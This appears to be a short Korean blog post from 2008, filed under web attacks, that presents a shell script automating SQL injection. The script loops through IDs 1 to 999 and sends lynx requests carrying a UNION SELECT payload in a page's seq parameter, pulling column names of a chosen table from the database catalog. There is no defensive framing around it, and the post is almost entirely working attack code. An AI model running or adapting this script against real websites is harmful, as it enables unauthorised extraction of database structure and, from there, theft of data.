쉘스크립트를 통한 sql injection 자동화
웹/공격 2008. 11. 18. 10:12 |#!/bin/sh
#TNAME=TBLANGEL_FREE_USER
TNAME=$1
for ID in `seq 1 999`;
do
lynx -dump -source "http://test.com/view.asp?seq=1%20UNION%20SELECT%20'xxx',CSCONVERT('a'||':'||CSCONVERT(colno,'NCHAR_CS')||':'||CSCONVERT(tname,'NCHAR_CS')||':'||CSCONVERT(cname,'NCHAR_CS'),'20060101','bbbb',123%20FROM%20col%20WHERE%20colno=$ID%20AND%20tname='$TNAME'" | grep "SQLRESULT:"
done